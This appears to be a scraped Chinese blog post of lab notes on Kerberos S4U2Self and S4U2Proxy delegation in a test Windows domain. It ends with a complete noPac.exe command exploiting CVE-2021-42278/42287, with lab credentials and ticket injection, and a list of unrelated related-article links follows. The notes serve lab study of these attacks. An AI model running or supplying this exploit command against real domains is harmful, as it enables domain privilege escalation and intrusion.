当前位置: 首页 > news >正文

#S4U2SELF#S4U2Proxy#CVE-2021-42278/42287

#S4U2SELF

Win08创建普通用户 

s4u2 

@xwj456

可以看到普通用户是没用委托属性的 

Win08手动赋予委托服务属性

setspn -A wsw/wsw.com s4u2 

Win10身份验证

s4u2

@xwj456

AS请求 

两个勾

两个勾和include-pac记得按上(蓝色) ,发包之前把wireshark打开,方便记录和排查

TGS请求

上面四个勾+下面两个勾

#S4U2Proxy 

申请其他服务 

Win08添加

添加cifs

组策略管理 

注意这里是用户s4u2

成功添加

请求之前打开wireshark

AS请求(同上)

第一次TGS请求(同上)

第二次TGS请求 

include-pac按掉,S4U2SELF不要勾 

最后生成的那个票据重命名proxy,复制到工具里

#CVE-2021-42278/42287 

noPac.exe
noPac.exe -domain test.com -user krbuser -pass @xwj123 /dc WIN-8RSOOTMELL5.test.com /mAccount demohb /mPassword @xwj123 /service cifs /ptt

(黄色部分每次都要改一改)

http://www.dtcms.com/a/185557.html

相关文章:

  • DeepWiki: Github的百科全书
  • MCP与GitHub的集成:开发者的“自动化流水线”革命
  • 什么是ERP?ERP有哪些功能?小微企业ERP系统源码,SpringBoot+Vue+ElementUI+UniAPP
  • 傲云源墅:以五傲价值重构北京主城别墅格局
  • 自动发电控制是一次调频还是二次调频?
  • Java面试终极篇:Sentinel+Seata+Kafka Streams高并发架构实战
  • Redis+Caffeine构造多级缓存
  • 数据库原理期末考试速成--最后附带两套题
  • 基于大模型的原发性醛固酮增多症全流程预测与诊疗方案研究
  • 硅基计划2.0 学习总结 壹 Java初阶
  • 在Mac环境下搭建Docker环境的全攻略
  • 红队视角下的域森林突破:一场由Shiro反序列化引发的跨域控攻防对抗
  • [Git]ssh下用Tortoisegit每次提交都要输密码
  • AnaTraf:深度解析网络性能分析(NPM)
  • 基于Qt6 + MuPDF在 Arm IMX6ULL运行的PDF浏览器——MuPDF Adapter文档
  • SMT贴片加工技术解析与应用要点
  • Linux 文件查看|查找|压缩|解压 常用命令
  • Github 2025-05-12 开源项目周报 Top15
  • Unity动画系统使用整理 --- Playable
  • 【后端】SpringBoot用CORS解决无法跨域访问的问题
  • 基于STM32、HAL库的BMP390L气压传感器 驱动程序设计
  • Spring MVC 和 Spring Boot 是如何访问静态资源的?
  • 脑机接口重点产品发展路径分析:以四川省脑机接口及人机交互产业攻坚突破行动计划(2025-2030年)为例
  • Meilisearch 安装
  • 智能手表 MCU 任务调度图
  • JSON 实体属性映射的最佳实践
  • 人脸识别deepface相关笔记
  • Spring Boot中Redis序列化配置详解
  • CSS3 伪元素(Pseudo-elements)大全
  • Kubernetes控制平面组件:Kubelet 之 Static 静态 Pod